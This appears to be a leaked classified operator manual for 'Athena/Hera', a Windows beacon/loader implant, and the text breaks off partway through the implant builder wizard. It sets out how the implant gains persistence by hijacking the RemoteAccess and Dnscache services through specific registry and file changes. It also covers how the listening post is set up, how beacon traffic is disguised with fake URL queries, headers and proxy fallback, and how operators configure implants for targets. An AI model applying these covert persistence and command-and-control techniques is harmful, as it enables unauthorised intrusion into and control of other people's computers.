Athena v1 - 0 UserGuide PDF

Download as pdf or txt
Download as pdf or txt
You are on page 1of 49

SECRET//NOFORN

Engineering Development Group

Athena / Hera
Version 1.0
User Manual
29 February 2016

Classified By: 2127215


Reason: 1.4(c)
Declassify On: 25X1, 20640205
Derived From: CIA NSCG MET S-06
SECRET//NOFORN
SECRET//NOFORN
________________________________________________________________________
CHANGE LOG
Authority/
Doc Rev
Doc Date Change Description Reference Approval
Rev By
Date
11/19/2015 ATI Initial creation

SECRET//NOFORN
SECRET//NOFORN
________________________________________________________________________
TABLE OF CONTENTS
ATHENA / HERA.........................................................................................................................I
VERSION 1.0.................................................................................................................................I
USER MANUAL...........................................................................................................................I
1. (U) SCOPE..................................................................................................................................1
2. (U) SYSTEM OVERVIEW.......................................................................................................1
3. (S//NF) ATHENA/HERA CONCEPT OF OPERATION (CONOP)....................................2
3.1 (U) SUMMARY OF CAPABILITIES............................................................................................3
4. (S//NF) SYSTEM VERSIONS..................................................................................................3
4.1 (S//NF) ATHENA.....................................................................................................................3
4.2 (S//NF) HERA.........................................................................................................................4
4.3 (S//NF) ATHENA/HERA VERSION COMPARISON....................................................................5
5. (U) LISTENING POST.............................................................................................................5
5.1 (U) INSTALLATION.................................................................................................................6
5.2 (U) CONFIGURATION..............................................................................................................9
5.3 (U) MANAGEMENT...............................................................................................................10
6. (U) BUILDER..........................................................................................................................11
6.1 (U) USAGE............................................................................................................................11
6.2 (U) COMMAND LINE OPTIONS.............................................................................................12
6.3 (U) WIZARD........................................................................................................................13
6.4 (U) CONFIGURATION............................................................................................................15
6.5 (U) OUTPUT..........................................................................................................................19
7. (U) IMPLANT INSTALLATION..........................................................................................23
7.1 (U) OVERT INSTALLATION ON DISK MODE.........................................................................23
7.2 (U) RANDOM ACCESS MEMORY-ONLY (RAM-ONLY) MODE.............................................23
7.3 (U) IMPLANT OFFLINE INSTALLATION................................................................................23
8. (U) TASKER............................................................................................................................25
8.1 (U) USAGE............................................................................................................................26
8.2 (U) COMMAND LINE OPTIONS.............................................................................................26
8.3 (U) USER INTERFACE...........................................................................................................28
8.4 (U) USER INTERFACE EXAMPLE..........................................................................................34
8.5 (U) OUTPUT..........................................................................................................................36

SECRET//NOFORN i
SECRET//NOFORN
________________________________________________________________________
9. (U) PARSER.............................................................................................................................36
9.1 (U) USAGE............................................................................................................................37
9.2 (U) COMMAND LINE OPTIONS.............................................................................................37
9.3 (U) PROCESSING RESPONSES AND SAFETIES........................................................................38
9.4 (U) OUTPUT..........................................................................................................................38
9.5 (S//NF) ERROR CODES........................................................................................................41
10. (U) NOTES AND OBSERVATIONS...................................................................................42
10.1 (U) INSTALLATIONS OF HERA REQUIRE A REBOOT FOR ELEVATED ACCESS PRIVILEGES 42
10.2 (U) INSTALLER AND RAM_ONLY VERSIONS SHOULD NEVER BE RUN FROM DISK.......42
10.3 (U) BUILDER DOES NOT PRODUCE A BIT COPY OF AN EXISTING CONFIGURED IMPLANT
....................................................................................................................................................42
10.4 (U) OFFLINE INSTALLER MAY REPORT A FALSE FAILURE ON WINDOWS 10
INSTALLATIONS..........................................................................................................................42
10.5 (S//NF)TIMEOUTS MAY OCCUR WHILE PROCESSING LARGE FILES..................................42
11. (U) ACRONYMS / ABBREVIATIONS...............................................................................43

LIST OF FIGURES
FIGURE 1 (S//NF) ATHENA/HERA CONCEPT OF OPERATION...................................2
FIGURE 2 - (S//NF) LISTENING POST DIRECTORY HIERARCHY.................................6
FIGURE 3 - (S//NF) UBUNTU REPOSITORY LISTING EXAMPLE...................................6
FIGURE 4 - (S//NF) OPTIONAL SSL CERTIFICATE CREATION.....................................6
FIGURE 5 - (S//NF) FAILED SETUP.PY SCRIPT OUTPUT.................................................7
FIGURE 6 - (S//NF) PIP OUTPUT FOR MANUAL BOTTLE INSTALL..............................7
FIGURE 7 - (S//NF) COMPLETING SETUP.PY SCRIPT OUTPUT.....................................8
FIGURE 8 - (S//NF) LISTENING POST CONFIGURATION FILE......................................9
FIGURE 9 - (S//NF) BUILDER COMMAND LINE OPTIONS.............................................12
FIGURE 10 - (S//NF) SYSTEM BINARY PATH.....................................................................13
FIGURE 11 - (S//NF) BUILDER WIZARD REVIEW............................................................15
FIGURE 12 - (S//NF) EXAMPLE RECEIPT FILE - XML....................................................22
FIGURE 13 - (S//NF) BUILDER OUTPUT FILES..................................................................22
FIGURE 14 - (S//NF) WINDOWS OFFLINE INSTALLER...................................................24
FIGURE 15 - (S//NF) LINUX OFFLINE INSTALLATION...................................................25
FIGURE 16 - (S//NF) TASKER COMMAND LINE OPTIONS.............................................26

SECRET//NOFORN ii
SECRET//NOFORN
________________________________________________________________________
FIGURE 17 - (S//NF) TASKER MAIN MENU........................................................................28
FIGURE 18 - (S//NF) TASKER SHELL INTERFACE EXAMPLE PART 1....................35
FIGURE 19 - (S//NF) TASKER SHELL INTERFACE EXAMPLE PART 2....................35
FIGURE 20 - (S//NF) PARSER COMMAND LINE OPTIONS.............................................37

SECRET//NOFORN iii
SECRET//NOFORN
________________________________________________________________________
LIST OF TABLES
TABLE 1 - (U) APPLICABLE DOCUMENTS..........................................................................1
TABLE 1 - (U) APPLICABLE DOCUMENTS..........................................................................1
TABLE 2 - (S//NF) ATHENA SYSTEM COMPONENTS........................................................1
TABLE 2 - (S//NF) ATHENA SYSTEM COMPONENTS........................................................1
TABLE 3 - (U) INSTALLED FILE AND REGISTRY RESOURCES.....................................3
TABLE 4 - (U) INSTALLED FILE AND REGISTRY RESOURCES.....................................4
TABLE 5 - (S//NF) DIFFERENCES BETWEEN VERSIONS.................................................5
TABLE 6 - (S//NF) SIMILARITIES BETWEEN VERSIONS.................................................5
TABLE 7 - (S//NF) STEP-BY-STEP IMPLANT CONFIGURATION INSTRUCTIONS...15
TABLE 8 - (S//NF) REQUIRED OFFLINE INSTALLER COMPONENTS........................25
TABLE 9 (U) COMMAND FILE ENCODING.....................................................................36
TABLE 10 - (U) ERROR CODES..............................................................................................41
TABLE 11 - (U) ACRONYMS AND ABBREVIATIONS.......................................................43

SECRET//NOFORN iv
SECRET//NOFORN
________________________________________________________________________

1. (U) Scope
(U) This document establishes the User Guide for Athena v1.0 and for Hera v1.0. See Section 4
for a discussion of the specific characteristics of each system.
Table 1 - (U) Applicable Documents
Description Date Version
Athena v1.0 User Requirement Document
3-Feb-2016 REV G
OPS0001051
Hera v1.0 User Requirement Document
15-Feb-2016 REV B
OPS0001743
Athena v1.0 IV&V Report TBS TBS

2. (U) System Overview


(S//NF) The Athena System fulfills COG/NOD's need for a remote beacon/loader. Table 2 shows
the system components available in Athena/Hera v1.0. The target computer operating systems
are Windows XP Pro SP3 32-bit (Athena only), Windows 7 32-bit/64-bit, Windows 8.1 32-
bit/64-bit, Windows 2008 Enterprise Server, Windows 2012 Server, and Windows 10. Ubuntu
v14.04 is the validated Linux version. Apache 2.4 is the validated web server for the Listening
Post.
Table 2 - (S//NF) Athena System Components
Component / Language
Application Function Operating System Used
Provides the ability to build packages
for specified targets. (e.g. installers,
Builder Linux / Windows Python 3.4
offline scripts, ram-only modules and
receipts)
Provides the ability to task a specific
Tasker implant. (e.g. get, put, set, memload, Linux / Windows Python 3.4
memunload, delete and uninstall)
Provides the ability to decode
Parser Linux / Windows Python 3.4
responses from the target.
Provides interaction with the remote
Listening Post target. All batch tasking files are Linux(Apache) Python 3.4
copied to this server for processing.
Installs the tool onto the target system
Installer Windows x86/x64 C++
(DLL file)
Execute a diskless version of the
RamOnly implant as a DLL on the target Windows x86/x64 C++
system (DLL file)
Install the tool onto the target system
OffLine with physical access using Linux Linux / Windows x86/x64 bash/C++
Boot or Windows Recovery Console.

SECRET//NOFORN 1
SECRET//NOFORN
________________________________________________________________________
3. (S//NF) Athena/Hera Concept of Operation (CONOP)

Figure 1 (S//NF) Athena/Hera Concept of Operation


(S//NF) Figure 1 depicts the Athena Concept of Operation. The Athena/Hera system consists of a
Builder, Tasker, Parser, Listening Post, Installer, ramonly and offline capabilities.

(S//NF) The operator uses the Builder (builder.py) to tailor an implant for the specific
operational scenario. The operator then deploys the configured implant (Installer) on a target
computer.

(S//NF) Once activated, the Installer will modify the target registry and drop the host file
(IprCache.dll default) and data file (ras.cache default) in their specified locations. The
installation tool will restart the RemoteAccess service and launch the Athena Engine in the
netsvcs svchost.exe process. The installed tool will beacon to the Listening Post (LP) to receive
tasking.

(S//NF) The system also allows the Operator to configure certain behavior of the tool at runtime
during beacon events. The Tasker (tasker.py) is used to task the implant. The Parser
(parser.py) is used to decode the results retrieved from the Listening Post.

Note (S//NF) The Installer must be executed as an Administrator


or any other user account with permissions to start/stop
services, modify the registry and write to the system32
directory/subdirectories.

SECRET//NOFORN 2
SECRET//NOFORN
________________________________________________________________________
3.1 (U) Summary of Capabilities
(S//NF) The following is a summary of the system capabilities:
Executes on the Windows XP (SP3)/7/8.1/2008/2012/10 (x86/x64) operating systems.
Provides a beaconing capability that provides configuration and task handling
Provides memory loading/unloading of NOD Persistence Specification DLLs on the
target system
Provides delivery and retrieval of files to/from a specified directory on the target system
Allows the operator to configure settings during runtime (while the implant is on target)
4. (S//NF) System Versions
(S//NF) The system was designed to allow a base installation (Athena) and an extended
installation (Hera). Both versions contain the full command set defined in this document. This
section will describe the differences between the implementations and configurations.

4.1 (S//NF) Athena


(S//NF) Athena is the primary implementation for use on WinXP through Win10 operating
systems. This implementation uses the RemoteAccess service for persistence, ZLIB for
compression and XTEA for encryption on disk.

4.1.1 ((S//NF) On-Target Footprint


(S//NF) The Athena implant is compliant with the NOD Persistence Specification for persistent
DLLs and provides its own persistence mechanism. Athena will be hosted by the RemoteAccess
service. There is an external DLL that this service will load that is not a service DLL.
Table 3 - (U) Installed File and Registry Resources
File System Modification Location Configuration Item Description
%SystemRoot%\\System32\\ TARGET_FILENAME The overt target file location on disk that is
Microsoft\\Crypto\\RAS\\iprcache.dll referenced by the RemoteAccess service.
%SystemRoot%\\System32\\ DATA_FILENAME The overt data file location on disk that
CodeIntegrity\\ras.cache contains the package file (config, engine,
etc.).
SYSTEM\\CurrentControlSet\\Services\\ DLLPath This overt registry entry forces the
RemoteAccess\RouterManagers\\IP RemoteAccess service to load the target
Start = 2 DLL before loading the true support DLL.
Type = 20
SYSTEM\\CurrentControlSet\\Services\\ None This overt registry entry is updated to
RasMan allow this dependent service to start when
Start = 2 the RemoteAccess service starts.
Type = 20
SYSTEM\\CurrentControlSet\\Services\\ None This overt registry entry is updated to
SStpSvc allow this dependent service to start when
Start = 2 the RemoteAccess service starts.
Type = 20
SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\ None Used by RemoteAccess Service
RouterManagers\\Ip (Windows10 Only)
DLLPath= %SystemRoot%\\System32\\iprtrmgr.dll

SECRET//NOFORN 3
SECRET//NOFORN
________________________________________________________________________
File System Modification Location Configuration Item Description
SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\ None Used by RemoteAccess Service
RouterManagers\\Ip (Windows10 Only)
GlobalInfo= <BINARY DATA>
SYSTEM\\CurrentControlSet\\services\\RemoteAccess\\ None Used by RemoteAccess Service
RouterManagers\\Ip (Windows10 Only)
ProtocolId= 0x00000021

4.2 (S//NF) Hera


(S//NF) Hera is a secondary implementation for Windows 8 through Windows 10. The output
receipt file will contain a special key <BRAVO>1</BRAVO> in the XML file. This
implementation uses the Dnscache service for persistence, BZIP2 for compression and AES 256
for encryption on disk.

4.2.1 ((S//NF) On-Target Footprint


(S//NF) The Hera implant is compliant with the NOD Persistence Specification for
persistent DLLs and provides its own persistence mechanism. Hera will be hosted
by the DNSClient service. There is an external DLL that this service will load that is
not a service DLL.
Table 4 - (U) Installed File and Registry Resources
File System Modification Location Configuration Item Description
%SystemRoot%\\System32\\ TARGET_FILENAME The overt target file location on disk
Microsoft\\Crypto\\DNS\\dnscache.dll that is referenced by the Dnscache
service.
%SystemRoot%\\System32\\ DATA_FILENAME The overt data file location on disk that
CodeIntegrity\\dns.cache contains the package file (config,
engine, etc.).
SYSTEM\CurrentControlSet\Services\ Parameters\extension This overt registry entry forces the
Dnscache Dnscache service to load the target
DLL before loading the true support
Start = 2 DLL.
Type = 20
SYSTEM\CurrentControlSet\Services\ ImagePath %SystemRoot%\system32\svchost.exe
Dnscache -k netsvcs
SYSTEM\CurrentControlSet\Services\ ObjectName LocalSystem
Dnscache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Netsvcs Ensure that the dnscache service is
Windows NT\CurrentVersion\Svchost included on the list of netsvcs.

4.2.2 (U) Installation Notes


(S//NF) The installation will hijack the Dnscache service. On Windows 7 and 8, this service is
running in a netsvcs instance by default but on Windows 8.1 and Windows 10, this service runs
as NetworkService. The NetworkService user context has reduced security capability on the
system. Due to the srvhost implementation, the service will only run in the netsvcs context at
next reboot. To account for this deficiency and still provide immediate execution after
installation, the existing service will run as NetworkService until next reboot at which time the
System user netsvcs will be engaged.

SECRET//NOFORN 4
SECRET//NOFORN
________________________________________________________________________
4.3 (S//NF) Athena/Hera Version Comparison
Table 5 - (S//NF) Differences between Versions
Feature Athena Hera
Hash (function names) Adler hash from zlib Superfast hash
Mask(local encryption) XTEA with key increment AES with reduced key space
Packing Mask 0x3B 0x5C
String Mask 0x5D8E1792 0xAF27D2C9
Compilation MSVC 2013 LLVM 3.7.0
Module Compilation Installer.dll Installer.bravo.dll
(actual modules using alternate compilation) Host.dll Host.bravo.dll
Ram_only.dll Ram_only.bravo.dll
Persistence RemoteAccess Dnscache
Compression ZLIB BZip2

Table 6 - (S//NF) Similarities between Versions


Feature Commonality
Data file File format and content is the same but the masking is different
Business Logic The command module uses different masking but the code is compiled with MSVC and will look similar.
This module is dynamically loaded.
Engine The engine module has mostly the same code between the two modules and is complied with MSVC and
will look similar. This module is dynamically loaded.
Uninstall The uninstall module will be almost identical between versions. This module is dynamically loaded.
Imports The import tables between (Installer/host/ram_only) will be similar. Additional unused imports have been
included in the Hera version.
Communications The communications between the versions has not changed (i.e., RSA with a generated session AES 256
key)
State File Logic The state file logic is the same and the stored files may have similar information but will be masked
differently on disk.
Function Ordering No function abstractions have been incorporated between the versions. Functionally, these two versions
should produce virtually the same function call list.

5. (U) Listening Post


(S//NF) The Listening Post (LP) uses a Bottle Python Web Framework WSGI interface to
simplify the Listening Post interface between the targets and the server. The tasker.py tool
generates encrypted tasking that is placed on the Listening Post for distribution to client targets.
The targets respond with an encrypted file that can be decrypted with the parser.py tool.
(S//NF) The Listening Post was designed to function as a simple file server to deliver tasking to
the target. The LP server was designed to run with Apache Server (2.4) running on Ubuntu
v14.04. Tasking files generated by the Tasker are placed into user configured directories
generated by the server setup script. The target will beacon into the LP for tasking and the LP
will respond by parsing client directories and sending back data from the corresponding
directory. The directory is organized in a single parent folder to multiple child folders specified
by the implants 4 character identifier. The directory hierarchy is laid out as follows:

SECRET//NOFORN 5
SECRET//NOFORN
________________________________________________________________________
ROOT folder
|---- server log files
|---- Parent ID folder (e.g., TEST)
| |---- parent tasking files
| |---- Child ID folder
| | |-- inbox folder (files received from the implant)
| | |- Responses and safety files
| | |-- outbox folder (files to be sent to the implant)
| | |- tasking files
| |---- Child ID folder
|
|---- Parent ID folder

Figure 2 - (S//NF) Listening Post Directory Hierarchy

5.1 (U) Installation


(S//NF) The Listening Post server setup is performed by the setup.py script. The python script
setup.py should be run on Ubuntu v14.04. The setup script will install all required files
automatically if an Ubuntu repository can be reached. The following is a list of required
packages:
Apache 2.4
Apache mod_wsgi module
Python 3.4
Python pip (only used to retrieve bottle)
Python bottle web framework

(S//NF) Validate that the current Ubuntu instance has the correct repository location. This can be
validated by viewing the source.list file.
> /etc/apt/sources.list
deb http://repo.devlan.net/ubuntu trusty main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-security main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-updates main universe multiverse restricted
deb http://repo.devlan.net/ubuntu trusty-backports main universe multiverse restricted
Figure 3 - (S//NF) Ubuntu Repository Listing Example
(S//NF) The SSL component of the install requires a valid SSL certificate. By selection NO to
the option use pre-existing SSL certificate and key, will generate a new certificate for you.
OpenSSL can also be used to generate a certificate. The follow example shows how this can be
done.
> openssl genpkey -algorithm RSA -out a.key
> openssl req -new -key a.key -out a.req -subj /CN=1.1.1.1
> openssl x509 -req -in a.req -signkey a.key -out a.cert
> sudo apt-get update
Figure 4 - (S//NF) Optional SSL Certificate Creation
(S//NF) To run the installation tool from the current Ubuntu instance, copy the Listening Post
directory from the installation disk to the Ubuntu v14.04 instance. The Ubuntu v14.04 Linux
distribution already contains Python 3.4 pre-installed. Use the provided installation script to
complete the installation.

SECRET//NOFORN 6
SECRET//NOFORN
________________________________________________________________________
> sudo python3 setup.py -install
~/Desktop/listeningpost$ sudo python3 setup.py -install
Verifying packages are installed ...
Apache is not installed. Do you want to install? (Y/N) default: Y

Installing Apache...
Mod-wsgi is not installed. Do you want to install? (Y/N) default: Y

Installing Mod-wsgi...
Python-pip is not installed. Do you want to install? (Y/N) default: Y

Installing pip3...
Python Bottle is not installed. Do you want to install? (Y/N) default: Y

Installing Bottle...
Failed installed. Try manual install.
One or more install packages did not exist or failed. Continue? (Y/N) default: N
y
Copying files to /var/www/html

Server configuration file options:


Enter full path to tasking directory, i.e. /var/www/html/data:

Server configuration file options:


Enter full path to tasking directory, i.e. /var/www/html/data: ^CTraceback (most recent
call last):
File "setup.py", line 315, in <module>
install()
File "setup.py", line 42, in install
write_config()
File "setup.py", line 132, in write_config
root_dir = input("Enter full path to tasking directory, i.e. {}/data:
".format(www_dir))
Figure 5 - (S//NF) Failed setup.py Script Output
(S//NF) Should the install script fail to find bottle, the Operator must install bottle manually.
This condition can occur if a pip server cannot be found or if bottle is not installed on the pip
server. To support this situation, bottle has been included on the Listening Post distribution disk.
Use the following command to install bottle manually:
sudo pip3 install bottle/bottle-0.12.8.tar.gz

> sudo pip3 install bottle/bottle-0.12.8.tar.gz


Unpacking ./bottle-0.12.8.tar.gz
Running setup.py (path:/tmp/pip-0C2Zam-build/setup.py) egg_info for package from
file:///home/xxx/Desktop/listeningpost/bottle/bottle-0.12.8.tar.gz

Installing collected packages: bottle


Running setup.py install for bottle
changing mode of build/scripts-2.7/bottle.py from 644 to 755

changing mode of /usr/local/bin/bottle.py to 755


Successfully installed bottle
Cleaning up...
Figure 6 - (S//NF) pip Output for Manual Bottle Install
(S//NF) If the installation did not complete, it can be restarted to complete the installation.
> python3 setup.py -install
Verifying packages are installed ...
Copying files to /var/www/html

Server configuration file options:


Enter full path to tasking directory, i.e. /var/www/html/data:
Nothing was entered, using /var/www/html/data
/var/www/html/data does not exists, creating.
Enter name of inbound folder: IN

SECRET//NOFORN 7
SECRET//NOFORN
________________________________________________________________________
Enter name of outbound folder: OUT
Enter URL path of tasking resources (comma separated), i.e. /blog/comments, /php/id: /
Enter URL path of web resources (comma separated), i.e. /, /web: /html
Enabling mod-wsgi
Disabling default site.
Use pre-existing SSL certificate and key? (Y/N) default: N

Generating a 2048 bit RSA private key


......................+++
..+++
writing new private key to 'fileserver.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
Moving cert to /etc/ssl/certs/fileserver.crt
Moving key to /etc/ssl/private/fileserver.key
Enabling SSL site 001-default-ssl.conf
Disabling port 80.
Restarting services...
Install done.
Figure 7 - (S//NF) Completing setup.py Script Output
(S//NF) After installing the required packages, the setup script will modify Apache to enable
SSL on port 443 and generate any required SSL keys and certificate if not supplied. In addition,
the setup script will ask to setup the directories where the tasking files will reside.
(S//NF) After installation is complete, make sure to check that the file/folder exists, proper
permissions have been applied, and Apache is successfully running on port 443. The setup script
expects a default installation of Apache 2.4. If any configuration files have been modified, the
setup script may not work correctly. You may have to manually modify the /etc/apache2/sites-
available/001-default-ssl.conf to point to the correct location of your SSL keys and certs. In
addition, add the following line under DocumentRoot, to enable WSGI:
WSGIScriptAlias / /var/www/html/app.wsgi
(S//NF) The directory /var/www/html should contain three files; app.wsgi, server.py, and
config.json. To disable port 80, edit /etc/apache2/ports.conf and comment out the line with
"Listen 80".
(U) Some common Apache commands are listed below:
sudo a2enmod - to enable a module, i.e. sudo a2enmod wsgi
sudo a2dissite - to disable a site configuration
sudo a2ensite - to enable a site configuration
sudo service apache2 restart - restart Apache
sudo service apache2 start
sudo service apache2 stop
tail f /var/log/apache2/access.log

SECRET//NOFORN 8
SECRET//NOFORN
________________________________________________________________________
5.2 (U) Configuration
(S//NF) The Listening Post instance can be configured with a local JSON encoded text file called
config.json. The setup script will write out a configuration file, config.json, as well as copy the
corresponding required Server python files to /var/www/html. The config.json file contains the
information generated by the setup script and is read by the Server python script on start-up. The
config.json can be edited manually to add/modify/delete any user updates, if edits are made the
Apache server should be restarted to insure everything is refreshed. The config.json contains,
{
"DATA_URLS": ["/blog/comm", "/php/id", "/"],
"ROOT_DIR": "/srv/athena",
"WEB_URLS": ["/html", "/", "/web"],
"OUT_FOLDER": "OUT",
"IN_FOLDER": "IN",
"HOST" : "0.0.0.0",
"PORT" : "",
"LOG_SIZE" : "65536",
"HTTP_ERROR_CODE" : 200
}
Figure 8 - (S//NF) Listening Post Configuration File

Warning (S//NF) The values in DATA_URLS must contain the value


configured in the Implant Builder field, Beacon URL Path for
LP. The values in WEB_URLS must contain the value
configured in the LP Builder field, URL Path for Web
Resources.
1) DATA_URLS This is the virtual URL path sent from the target to inform Apache to forward requests to
the Athena Listening Post.
2) ROOT_DIR - This is the root directory location where the parent folder must be created with the 4
character identifier configured for the target.
3) WEB_URLS This value defines the URL path of web resource. This can be any URL path that you plan
on delivering normal web content (must not be the same as tasking URL path)
4) DATA_URLS - Tasking directory - this is the root directory location where the parent folder must be
created with the 4 character identifier configured for the target.
5) OUT_FOLDER - This folder contains the tasking files generated by the Tasker that will be sent to the
target for processing.
6) IN_FOLDER - This folder contains the files that the target will upload back to the LP for post-processing
by the Parser.
7) HOST This is the NIC binding address. (default 0.0.0.0)
8) PORT This value defines the web port. (default 443)
9) LOG_SIZE This value defines the size of a single log file. (default 64K) By setting this value to zero, no
logging information will be stored. The server will store at most 5 backup logs in the current instance.
10) HTTP_ERROR_CODE This value defines the error code returned to the target when an error occurs. It
is the responsibility of the system administrator to validate alternate return codes to support forwarding or
other capabilities.

HTTP Status codes for failure:

a) 407 - proxy authentication failed


b) 502, 504 - proxy or gateway failure
c) 600, 601, 602, 603 - squid error codes
d) All other status codes indicates successful beacon.

SECRET//NOFORN 9
SECRET//NOFORN
________________________________________________________________________
Note
(U) URLs should start with a slash ("/") but should not have
an ending slash.

5.3 (U) Management


(S//NF) To specify initial tasking for a target (i.e., when the target first beacons to the LP), create
a folder on the LP with the parent ID. Place any generic tasking created for the family of targets
in this parent folder. When a new target beacons, the LP creates a child folder for the specific
child ID and copies the parent tasking into the child folder. The LP only copies the parent tasking
to the child folder once -- when the child folder is initially created. On subsequent beacons, all
tasking will be pulled directly from the child folder. The Operator must manually copy the
targets specific tasking from the Tasker to the targets OUT directory as well as move files
from the targets IN directory for processing by the Parser tool.
(S//NF) If there is both parent and child tasking for a target, it will be processed in the following
order, based on the user-configured priority:
1. Child tasking
a. Non-persistent
b. Persistent
2. Parent tasking
a. Non-persistent
b. Persistent
Note
(S//NF) All child-specific tasking will take precedence over
any existing parent tasking.

5.3.1 (U) URL Query:


(S//NF) To obfuscate the URL request and prevent caching, each request from the target will
append a template with random data to each request. The following strings define the templates
for processing URL queries.
?keyword=%s&matchtype=p
?ping?clientid=%s
?event?a=%sy=false
?h.key=%s
?activityi;src=%s

5.3.2 (U) Request Headers


(S//NF) The request header will include user configured headers as well as default ones.
User Agent: (user-configured)
Accept: (user-configured)
Accept-Language: (user-configured)
Accept-Encoding: (user-configured)

SECRET//NOFORN 10
SECRET//NOFORN
________________________________________________________________________
Host: (user-configured domain beacon names)
Connection: keep-alive (default)
Cache-Control: private, no-cache, no-store, max-age=0\r\n (default)
Cookie: session-id= (default parent ID and generated child ID masked with a generated key)

5.3.3 (U) Data Formating


(S//NF) Before being sent back to the LP, the data undergoes the following transformations:
Data hash is computed using zlib adler32
Data is zlib compressed
Data is RSA encrypted
Data hash is appended to the data
Data signed digest is appended to the data
Masked parent and child ID are appended to the data

5.3.4 (U) Communications Settings


(S//NF) The connection logic to the LP takes into account the user configured proxy, IE
proxy, WPAP proxy, and direct connection. The CommMod will save and send back
to the LP any proxy information that was found for later use. The CommMod will use
the connection settings in the following order:
1. User configured Proxy settings
2. Direct Connection
3. IE previously saved Proxy settings
4. WPAD previously saved Proxy settings
5. Try the IE Proxy. If it is a new proxy setting then it will be saved for future use and sent back
to the LP.
6. Try the WPAD Proxy. If it is a new proxy setting then it will be saved for future use and sent
back to the LP.

6. (U) Builder
(S//NF) Some general usage comments are presented below:
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.

6.1 (U) Usage


(S//NF) This section contains information for configuring an implant. Figure 9 below shows the
command line options for the Builder.

SECRET//NOFORN 11
SECRET//NOFORN
________________________________________________________________________
Warning
(S//NF) Implant configuration may be completed on the low-
side; however, the operator should be aware that
cryptographic key data will be in the clear.

(S//NF) By default, the Builder will walk the operator through the process of configuring an
implant (via the wizard) that will be deployed to a target computer. Alternatively, the operator
can also input all configuration values via command line arguments in order to build an implant
with a single command.
Builder
usage: builder.py [-h] [-i SYSTEM_BINARY_PATH] [-r SYSTEM_IMPORT_XML]
[-o SYSTEM_EXPORT_PATH] [-w] [-b] [--debug]

Builder Configuration

optional arguments:
-h, --help show this help message and exit
-i SYSTEM_BINARY_PATH, --input SYSTEM_BINARY_PATH
This argument provides the location of the raw binary
data files. (NOTE: .\bin is the default path).
-r SYSTEM_IMPORT_XML, --receipt SYSTEM_IMPORT_XML
This argument defines an existing receipt filename to
be used for default values.
-o SYSTEM_EXPORT_PATH, --output SYSTEM_EXPORT_PATH
This argument provides the output directory path to
store the target files (NOTE: .\builder_output is the
default path).
-w, --wizard This argument will request information from the user
via the wizard.
-b, --bravo This argument builds the Athena BRAVO implementation.
--debug This argument allows debugging information to be
included in the output directory.

Figure 9 - (S//NF) Builder Command Line Options

6.2 (U) Command Line Options


The builder.py script has multiple command line options. For most users, no command line
options are required. The local directory will be used to output results.
Usage: python.exe builder.py

6.2.1 (U) System Binary Path


(S//NF) This argument provides the location of the raw binary data files. The default location is
in the current directory in the BIN folder. Figure 10 (below) shows the files that must reside in
the system binary path.

SECRET//NOFORN 12
SECRET//NOFORN
________________________________________________________________________
BIN
offline - linux offline files
functions.sh
linux.sh
reged.static
target_x64.ini
target_x86.ini
x64 - 64 bit implant components
command.axe
engine.axe
host.dll
install.dll
offline.exe
ram_only.dll
uninstall.axe
x86 - 32 bit implant components
command.axe
engine.axe
host.dll
install.dll
offline.exe
ram_only.dll
uninstall.axe
Figure 10 - (S//NF) System Binary Path

6.2.2 (U) System Import XML


(S//NF) This argument provides the location of the existing receipt file to be used for
configuration information. This option is used to input specific information into this build (e.g.
use this option to create an exact copy of an existing build).

6.2.3 (U) System Export Path


(S//NF) This argument provides the output directory path to store the target files. By default, the
.\builder_output path is the location for the output. A sub-directory called RECEIPTS is
created in this directory to contain all receipts created by this installation. This simplifies parsing
by having all receipts in a single location. When creating implants for a group of targets, the
parent name will be in the output directory (e.g. .\builder_output\test). If a build is generated for
a specific child, the child name will be incorporated into the name of the output directory (e.g.
.\builder_output\test_ABCD0086).

6.2.4 (U) Debug


(S//NF) This argument allows debugging information to be included in the output directory.
When this option is selected, an additional debug directory is included in the output. This
contains all intermediary files required by the Builder and can be used to support debugging.

6.3 (U) Wizard


(S//NF) The following (Figure 11) shows an example of using the wizard option of the Builder in
order to configure and build an implant. Select the default value by using ENTER key.
$ python.exe builder.py

Builder
Generating client RSA key pair
Generating server RSA key pair

Athena Wizard:
This wizard will guide you through the input options for the Athena tool.
Press enter to accept default value.

SECRET//NOFORN 13
SECRET//NOFORN
________________________________________________________________________

Target - Parent ID (4 chars)


default:[RnzI]
new value:

Target - Child ID (number - dword)


default:[]
new value:

Target - dynamic data config type (internal,file,registry)


default:[internal]
new value:

Beacon - Interval in seconds (number)


default:[86400]
new value:

Beacon - Jitter as a percentage of Interval 0..100 (number)


default:[5]
new value:

Beacon - Boot Delay in seconds (number)


default:[60]
new value:

Beacon - Hibernation Delay in seconds (number)


default:[60]
new value:

Beacon - Tasking Delay in seconds (number)


default:[60]
new value:

Beacon - Domains (LP Server DNS hostname or IP Addresses separated by a comma)


default:[None]
new value: abc.com

Beacon - Port (number)


default:[443]
new value:

Beacon - Proxy Port NOTE:0=disable (number)


default:[0]
new value:

Beacon - User Agent String (string)


default:[Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)]
new value:

Beacon - URL Path for LP (string)


default:[/]
new value:

Beacon - Accept Header (string)


default:[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
new value:

Beacon - Accept Language Header (string)


default:[en-US,en;q=0.5]
new value:

Beacon - Accept Encoding Header (string)


default:[application/octet-stream]
new value:

Beacon - IE Proxy Address (string)


default:[]
new value:

Beacon - WPAD Proxy Address (string)


